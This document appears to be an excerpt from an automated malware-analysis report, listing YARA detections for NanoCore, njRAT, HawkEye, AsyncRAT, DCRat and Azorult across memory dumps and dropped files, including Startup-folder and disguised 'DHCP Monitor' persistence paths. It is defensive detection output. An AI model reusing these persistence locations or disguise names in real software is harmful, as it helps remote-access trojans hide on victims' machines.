                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.530edf.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
                    Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
                    Source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED Matched rule: Detects NanoCore Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Detects NanoCore Author: ditekSHen
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Windows\Help\active_desktop_render.dll, type: DROPPED Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
